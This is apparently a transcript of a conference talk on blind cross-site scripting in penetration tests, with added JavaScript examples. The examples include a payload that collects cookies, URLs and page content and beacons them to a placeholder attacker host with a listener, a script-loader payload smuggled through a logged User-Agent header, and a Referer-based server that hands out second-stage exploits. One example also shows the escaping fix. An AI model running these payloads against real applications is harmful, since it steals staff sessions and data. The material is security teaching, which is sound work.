Blind XSS

Adam Baldwin is the Team Lead at Lift Security, a web application security consultancy, and the Chief Security Officer at &yet (andyet.net). He at one time possessed a GCIA and CISSP. Adam is a highly knowledgeable information security expert: he created the DVCS pillaging toolkit and helmet, the security header middleware for node.js, is a minor contributor to the W3AF project, and has previously spoken at DEF CON, Toorcon, Toorcamp, DjangoCon, and JSConf.


  1. BLIND XSS @adam_baldwin Tuesday, February 26, 13
  2. Adam Baldwin • Chief Security Officer at &yet • Security Lead for ^Lift Security • Also @liftsecurity & @nodesecurity
  3. LET’S TALK BLIND XSS • What is it? • Using it in penetration tests • Challenges • xss.io
  4. WTF IS BLIND XSS
  5. XSS IS: • Reflected • Persistent (stored) • DOM
  6. BLIND XSS IS: • Reflected • Persistent (stored) • DOM (the same three; what is blind is that you never see where your payload renders)
  7. IT’S A DIFFERENT CHALLENGE.
  8. IT’S NOT LIKE BLIND SQLI WHERE YOU GET IMMEDIATE FEEDBACK.
  9. YOU HAVE NO IDEA WHERE YOUR PAYLOAD’S GOING TO END UP.
  10. YOU DON’T EVEN KNOW WHETHER YOUR PAYLOAD WILL EXECUTE (OR WHEN!)
  11. YOU MUST THINK AHEAD ABOUT WHAT YOU WANT TO ACCOMPLISH.
  12. ... AND YOU HAVE TO BE LISTENING.
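The two constraints on slides 11 and 12 (decide in advance what the payload must accomplish, and have something listening when it eventually fires) are easiest to see in code. The following is an added example written for this page, not code from the talk or from xss.io: collectContext() is a second-stage script that, wherever and whenever the stored payload finally runs, gathers what you need to locate the sink and ships it to a host you control; decodeBeacon() and makeListener() are the listening side. The hostname listener.example, the /c path and the d parameter are assumptions, and the fake window used to exercise it is constructed.

```javascript
// Added example for this page; not the talk's or xss.io's code.
// Assumed: callback host, beacon path and parameter name below.
const CALLBACK_HOST = 'listener.example';
const BEACON_PATH = '/c';
const DOM_SNAPSHOT_BYTES = 2048; // cap: we want the sink located, not the whole page

// Stage two. Runs in whoever's browser renders the stored payload (an admin,
// a support agent, a log viewer). Each probe is isolated so one throwing
// property (e.g. a cross-origin parent frame) cannot abort the whole beacon.
function collectContext(win) {
  const doc = win.document;
  const probe = (fn) => { try { return fn(); } catch (e) { return 'ERR:' + e.name; } };
  return {
    url: probe(() => win.location.href),           // where it actually fired
    origin: probe(() => win.location.origin),
    title: probe(() => doc.title),
    referrer: probe(() => doc.referrer),           // often the admin page before it
    cookie: probe(() => doc.cookie),               // non-HttpOnly cookies only
    ua: probe(() => win.navigator.userAgent),      // the viewer's browser, not yours
    framed: probe(() => win.top !== win),          // embedded in another app?
    dom: probe(() => doc.documentElement.outerHTML.slice(0, DOM_SNAPSHOT_BYTES)),
  };
}

// A GET beacon via an image request needs no CORS cooperation from the sink's
// origin: the request goes out whether or not the response is readable.
function beaconUrl(ctx, host = CALLBACK_HOST) {
  return 'https://' + host + BEACON_PATH + '?d=' + encodeURIComponent(JSON.stringify(ctx));
}

// The whole stage two, as it would be called from the injected script.
function fireBeacon(win, host = CALLBACK_HOST) {
  const url = beaconUrl(collectContext(win), host);
  const img = new win.Image();
  img.src = url;
  return url;
}

// Listener side (Node). Decodes one beacon URL or request path back into the
// context object; anything that is not a well-formed beacon yields null.
function decodeBeacon(urlOrPath) {
  const u = new URL(urlOrPath, 'https://' + CALLBACK_HOST);
  const raw = u.searchParams.get('d');
  if (u.pathname !== BEACON_PATH || raw === null) return null;
  try { return JSON.parse(raw); } catch (e) { return null; }
}

// Request handler that records every hit; pass it to http.createServer().
// Answers 204 with no body so the image request on the sink side stays silent.
function makeListener(hits) {
  return (req, res) => {
    const ctx = decodeBeacon(req.url);
    if (ctx) {
      hits.push({
        receivedAt: new Date().toISOString(),
        from: req.socket && req.socket.remoteAddress,
        ctx,
      });
    }
    res.writeHead(204);
    res.end();
  };
}

// Start it when you are ready to wait; blind payloads can fire days later.
// Not called here so the module stays importable without opening a port.
function startListener(port, hits) {
  return require('http').createServer(makeListener(hits)).listen(port);
}
```

Keep DOM_SNAPSHOT_BYTES small enough that the encoded beacon stays under the URL length limit of whatever fronts your listener (8 KB is a common default); if you need a bigger capture, switch the transport to navigator.sendBeacon or a POST and keep decodeBeacon's JSON handling the same.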
  13. FOR EXAMPLE... From a penetration test
  14.-39. (image-only slides: screenshots from the penetration-test example; no text survives)
  40. STEPS TO A SUCCESSFUL BLIND XSS EXPLOIT: 1. Carefully choose the right payload for the right situation.
  41. STEPS TO A SUCCESSFUL BLIND XSS EXPLOIT: 1. Carefully choose the right payload for the right situation. 2. Get lucky!
  42. HTML5SEC.ORG • Lots of payloads for various situations. • ...but doing everything would be overkill.
  43. PLAN YOUR PAYLOAD. HOW WILL THE APP USE YOUR DATA?
  44. NICE TARGETS: • log viewers • exception handlers • customer service apps (chats, tickets, forums, etc) • anything moderated
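Slide 44's targets have one thing in common: your input is stored somewhere you never see and rendered later, to someone else, by code written on the assumption that only trusted people look at it. The added example below (written for this page, not from the talk) walks one such path end to end, which is also what slide 43's question about how the app will use your data comes down to: a request whose User-Agent header carries a payload is logged, never reflected to the sender, and later rendered by an admin-only log viewer, once with the string concatenation such viewers often use and once with output encoding at the sink. The request, the log entries, the viewer markup and the host listener.example are all constructed for the example.

```javascript
// Added example for this page, not code from the talk. Everything below
// (the request, the log store, the viewer markup) is constructed to
// demonstrate the sink, not taken from a real application.

// The attacker's only view of this request is its status code; the header
// value is never reflected. It surfaces later, in a page they cannot see.
const STAGE1 = '<script src="https://listener.example/x.js"></script>'; // assumed host

function logRequest(store, req) {
  // What a typical access logger keeps. Nothing here is treated as untrusted
  // because "it's just a log".
  store.push({
    ts: req.ts,
    ip: req.ip,
    method: req.method,
    path: req.path,
    status: req.status,
    ua: req.headers['user-agent'] || '-',
  });
  return store.length;
}

// Vulnerable viewer: string concatenation straight into the admin page.
// Every stored field is a blind XSS sink for whoever opens the log view.
function renderLogUnsafe(entries) {
  const rows = entries.map((e) =>
    '<tr><td>' + e.ts + '</td><td>' + e.ip + '</td><td>' + e.method + ' ' + e.path +
    '</td><td>' + e.status + '</td><td>' + e.ua + '</td></tr>');
  return '<table>' + rows.join('') + '</table>';
}

// Fixed viewer: encode for the HTML text context on the way out. Encoding at
// the sink rather than the source is what covers data that arrived by any
// route (headers, tickets, exception messages, moderation queues).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function renderLogSafe(entries) {
  const rows = entries.map((e) =>
    '<tr>' + [e.ts, e.ip, e.method + ' ' + e.path, e.status, e.ua]
      .map((v) => '<td>' + escapeHtml(v) + '</td>').join('') + '</tr>');
  return '<table>' + rows.join('') + '</table>';
}

// Rough regression check for the same sink: does the rendered page still
// contain, verbatim, a logged field that carries markup characters?
function rendersUnescaped(html, entries) {
  return entries.some((e) => /[<>"]/.test(e.ua) && html.includes(e.ua));
}

// Constructed traffic: one ordinary request, one carrying the payload.
function sampleLog() {
  const store = [];
  logRequest(store, { ts: '2013-02-26T10:00:00Z', ip: '203.0.113.5', method: 'GET',
    path: '/', status: 200, headers: { 'user-agent': 'Mozilla/5.0' } });
  logRequest(store, { ts: '2013-02-26T10:00:01Z', ip: '203.0.113.9', method: 'GET',
    path: '/login', status: 401, headers: { 'user-agent': STAGE1 } });
  return store;
}
```

The same shape applies to exception handlers and ticket systems: the field that is "only shown to staff" is the one to test, and the check is whether the viewer encodes for the context it writes into (text, attribute, or JavaScript string), not whether the logger validated on the way in.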
  45. (image-only slide)
  46. BLIND XSS MANAGEMENT
  47. XSS.IO CAN HELP!
  48. SIZE MATTERS... RIGHT? • Sometimes you need all the character space you can get. • No short-url GUID • xss.io uses custom referrer-based redirects instead
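Slide 48's trick is worth spelling out. Stage one has to fit whatever the sink allows (a header, a name field with a length limit), so it should be nothing more than a script tag pointing at a host you control, with no per-target GUID in the URL. The server then decides which second-stage exploit to serve from the request's Referer header, which tells it which page loaded the script. The following is an added example written for this page, not xss.io's implementation: stage1() builds the short loader, selectExploit() does the routing over a constructed rule set, and makeRouter() is the Node request handler. The host xss-c2.example, the rule set and the script names are assumptions.

```javascript
// Added example; not xss.io's code. Host, rules and script names are assumed.
const PAYLOAD_HOST = 'xss-c2.example';

// Stage one: the smallest loader that works in an HTML text context. The
// protocol-relative src follows the sink's scheme and an unquoted attribute
// value saves two characters. Length matters when the sink caps input.
function stage1(host = PAYLOAD_HOST) {
  return '<script src=//' + host + '></script>';
}

// Same loader with a per-target GUID in the path, for comparison.
function stage1WithGuid(host, guid) {
  return '<script src=//' + host + '/' + guid + '></script>';
}

// Routing rules: which second stage to serve for which loading page. The
// Referer is the URL of the page that rendered the stored payload. Browsers
// now default to Referrer-Policy strict-origin-when-cross-origin, so for a
// cross-origin script load you usually get only the origin: match on origin,
// never on path, and accept a referer that is just "https://host/".
const RULES = [
  { origin: 'https://admin.target.example', exploit: 'admin-panel.js' },
  { origin: 'https://support.target.example', exploit: 'ticket-queue.js' },
];
const FALLBACK = 'recon.js'; // unknown sink: just beacon context back

function selectExploit(referer, rules = RULES, fallback = FALLBACK) {
  let origin = null;
  if (referer) {
    try { origin = new URL(referer).origin; } catch (e) { origin = null; }
  }
  const hit = origin && rules.find((r) => r.origin === origin);
  return { origin, exploit: hit ? hit.exploit : fallback };
}

// Node request handler: serve the chosen script for any request path, so the
// loader URL never has to change. `scripts` maps exploit name to JS source.
// Returns the routing decision so a caller can log which sink called home.
function makeRouter(scripts, rules = RULES, fallback = FALLBACK) {
  return (req, res) => {
    const choice = selectExploit(req.headers && req.headers.referer, rules, fallback);
    const body = scripts[choice.exploit] || scripts[fallback] || '';
    res.writeHead(200, { 'Content-Type': 'application/javascript', 'Cache-Control': 'no-store' });
    res.end(body);
    return choice;
  };
}
```

If a sink sets Referrer-Policy: no-referrer, every load arrives with no Referer at all and lands on the fallback; the fallback script should therefore always beacon location.href back, so the missing routing information is recovered from inside the page instead.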
  49. EXPLOIT CREATOR • Snippets for common tasks • Quickly create and reference dynamic payloads
  50. DEAD DROP BLIND XSS API AND MANAGER
  51. (XSS.IO DEMO)
  52. </PRESENTATION> @adam_baldwin | @LiftSecurity
